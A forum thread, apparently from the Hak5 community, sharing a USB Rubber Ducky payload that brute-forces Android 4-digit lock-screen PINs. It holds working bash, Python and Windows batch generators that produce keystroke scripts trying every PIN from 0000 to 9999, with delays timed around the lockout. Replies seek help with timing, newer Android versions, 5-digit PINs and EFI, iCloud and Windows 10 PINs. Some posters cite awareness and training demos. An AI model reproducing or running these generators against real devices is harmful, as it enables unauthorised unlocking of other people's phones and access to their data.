Jump to content

[Payload] Android Brute Force 4-digit pin


Recommended Posts

  • 3 weeks later...

Just playing around with the Android 4 digit pin code and a Samsung Galaxy S2.

I noticed the S2 (maybe it depends on the version) didn't respond to the ENTER key on a external keyboard while in "standbye" mode. It will respond to the ESC key so if you have this problem change the DELAY 5000\nENTER to DELAY 5000\nESC.

If you want to playaround with the rubber ducky script, first give it a try with an external keyboard. Maybe your timeout settings are different so you need to change the delay settings.

Link to comment
Share on other sites

  • 2 weeks later...
  • 8 months later...
  • 5 months later...

Can someone please tell me how to insert the payloads in the USB Rubber Ducky and does anyone have the payload for EFI PIN's (4 digits)

im looking for the same. I have the code for Teensy 3. but i cant seem to get the payload to work correctly on the rubber duck.

These links list the codes used for the teensy 3 For EFI brute forcing and icould pin brute forcing.. Can someone PLEASE take a look at it and see if it need to be edited to work on the rubber ducky

http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/#UPDATE

http://orvtech.com/en/howto/ataque-fuerza-bruta-pin-icloud/

Link to comment
Share on other sites

  • 1 month later...

the adapter that will work for the iPhone is called the Apple Camera adapter. I have a few apple devices, and it works for all of them. I have yet to try the iPhone5 yet though as this requires the new camera adapter. Now we just need to get the timing/code corrected as the iPhone is a bit different than the Android.

Awesome Work!! Keep it up Darren!!

Link to comment
Share on other sites

  • 6 months later...

To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed
then:

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
Not sure whats going wrong with cygwin?

How can i modify this script to put a delay between each key stroke. so basically enter 0 delay 500ms enter 0 delay 500ms enter 0 delay 500ms enter 1 etc

Link to comment
Share on other sites

  • 2 months later...
  • 2 weeks later...

Hi great Ducky payload!

This works great on my android platform of 4.4.2 Samsung but is that any update or way through more recent android versions, I have tested it on the HTC one M8 and the script begins to run and navigates to the pin screen but the keypad will only work from physical access to the phone and not by the ducky or usb keyboard.

Any advice or tips would be great

Jake

Link to comment
Share on other sites

  • 3 months later...

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

will this script work against windows 10 pins as it is?

Link to comment
Share on other sites

  • 1 month later...

If anyone is having problems with the bash script, I have written something similar in Python. I mostly use the Raspberry Pi to do all my encoding. This script will inject 20 of the most common pin codes first, and then brute force afterwards.

#!/usr/bin/python

defaultList = ['1234', '1111', '0000', '1212', '7777', '1004', '2000', '4444', '2222', '6969', '9999', '3333', '5555', '6666', '1122', '1313', '8888', '4321', '2001', '1010'];
	
def main():
	fileOpen = open("android_payload.txt", "w+")
	fileOpen.write("DELAY 5000\n")
	
	for x in defaultList:
		fileOpen.write("STRING %s\n" % x);
		fileOpen.write("ENTER\nDELAY 500\n")
		
	for w in range(0,10):
		for z in range(0,10):
			for y in range(0,10):
				for x in range(0,10):
					fileOpen.write("STRING %d%d%d%d\n" % (w,z,y,x))
					if (x % 2) == 0:
						fileOpen.write("ENTER\n")
					fileOpen.write("ENTER\nDELAY 500\n")
					
		 
	fileOpen.close()

main()

  • Upvote 2
Link to comment
Share on other sites

  • 1 month later...

I am new to this program.script and USB Ducky. We use windows. I went to the online tool USB ducky toolkit to implement the code referenced above. Can someone help me recode it to work in the ducky toolkit. I would like to show this exercise on our training phones in class. Thank you.

Link to comment
Share on other sites

"Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class"

I am using it on Samsung note phones with 4 digit pin set. It would be awesome to have you create the bin for me. I still would like to learn how to recreate the script in the toolkit if possible. My issue is the number creation I think. Thanks

Link to comment
Share on other sites

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec

ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$

/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE

R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*

Volume in drive C has no label.

Volume Serial Number is 2499-C7D7

Directory of C:\Users\UserName\Desktop

07/07/2012 01:03 AM 165 Android Paths.txt

08/30/2012 08:00 PM 50 Android SDK Path.txt

12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt

3 File(s) 278 bytes

0 Dir(s) 831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt

DELAY 5000 ; echo {0000..9999}

STRING

DELAY 1000

ENTER

ENTER

C:\Users\UserName\Desktop>

Instead of using Linux terminal, I made a Batch script for this, it does the same thing,

Here is the code;

@echo off
setlocal
set NUM=0
set COUNT=0

echo REM Author: Siem>>input.txt
echo REM Idea taken from: Darren Kitchen
echo REM Description: Bruteforcer>>input.txt
echo DELAY 1000>>input.txt
echo.>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

:START
cls
IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT)
IF %NUM% LEQ 9 (set ZERO=000)
IF %NUM% GTR 9 (set ZERO=00)
IF %NUM% GTR 99 (set ZERO=0)
IF %NUM% GTR 999 (set ZERO=%)
IF %NUM% EQU 9999 (pause & exit)
echo DELAY 500>>input.txt
echo STRING %ZERO%%NUM%>>input.txt
echo ENTER>>input.txt
echo %ZERO%%NUM%
set /a NUM=%NUM% + 1
set /a COUNT=%COUNT% +1
goto START

:WAIT
echo.>>input.txt
echo REM Wait 30 seconds>>input.txt
echo DELAY 30000>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

You can change the delay a bit, I am still testing it, but this echos 0000..9999 without using Linux.

~Siem

Link to comment
Share on other sites

  • 3 weeks later...

Hi,

I'm new to the forum and wondered if someone might be able to help me. I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone!

Any help would be gratefully received.

I have Samsung GT-S5830i Android version 2.3.6

Thanks

Link to comment
Share on other sites

  • 9 months later...

Anyone have any suggestions as to how to keep the phone powered when attempting 5-pin code ? Doubt this phone will survive 160+ hours lol

I've tried using a Targus USB Hub, however I don't think the Data from the Rubber Ducky can traverse through the hub into to the micro usb otg to usb android adapter.. unless I'm doing something wrong- which I don't doubt lol

I guess an alternative is to break up the code into smaller chunks.. 00000-09999, 10000-19999, 20000-29999, and so on. would take forever lol 

any help would greatly be appreciated. cheers!

Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...